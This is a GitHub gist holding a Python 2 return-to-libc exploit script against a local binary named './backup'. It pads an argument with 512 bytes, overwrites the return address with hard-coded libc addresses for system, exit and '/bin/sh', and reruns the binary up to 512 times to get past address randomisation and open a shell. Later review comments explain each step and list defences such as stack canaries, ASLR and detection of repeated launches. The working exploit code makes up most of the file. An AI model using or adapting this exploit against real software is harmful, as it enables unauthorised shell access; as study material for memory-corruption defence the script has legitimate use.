
@ShivamShrirao
Last active March 28, 2018 20:13
from subprocess import call
from struct import pack
# NOTE(review): the paste lost its indentation. The layout below is the most
# plausible reading (loop body indented, a for/else at the end); confirm it
# against the original before relying on it.
# Ret2libc proof of concept against ./backup, kept as study material. It is
# Python 2 code: `print` statements, and `junk` (str) is concatenated with the
# bytes that pack() returns, which only works where str and bytes are one type.
key= "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474"  # passed as argv[2]; what ./backup checks it against is not visible here
junk = "A"*512 #junk padding -- filler up to the saved return address (the distance is taken as given, not derived here)
libc = 0xf7dc5000 #libc base address. Take any from ldd ./backup.
# The base is hard-coded, so every address below is only right when libc is
# mapped exactly there; with library ASLR on it moves between runs, which is
# presumably why the loop further down retries.
system = pack("I",libc+0x3c7d0) #system offset added to libc base and convert to little Endian
exit = pack("I",libc+0x2fb10) #exit offset added to libc base  (note: shadows the builtin exit)
sh = pack("I",libc+0x17888a) #/bin/sh offset added to libc base
# pack("I", ...) is a 4-byte native-order unsigned int (little-endian on x86,
# as the author notes). After the filler the three words sit as
# [system][exit][&"/bin/sh"], which on 32-bit cdecl is the address to return
# into, the return address system() will then use, and its first argument.
payload = junk + system + exit + sh #final payload
# Defender notes: the pattern needs a fixed stack layout and a predictable
# libc base. A stack canary, library ASLR, or bounds-checked argument handling
# in ./backup each breaks it; 512 back-to-back invocations of the same binary
# with a 524-byte argv[3] is also an easy pattern to alert on.
for i in range(512): #for loop to execute 512 times
    print i #counter
    ret=call(["./backup","aaa",key,payload]) #call ./backup with proper arguments; ret is the child's exit status
    if (not ret): #break on successful exploit -- exit status 0 is treated as success
        print "**************"
        break
else:
    print "Exploit failed !"  # for/else: reached only if no iteration broke out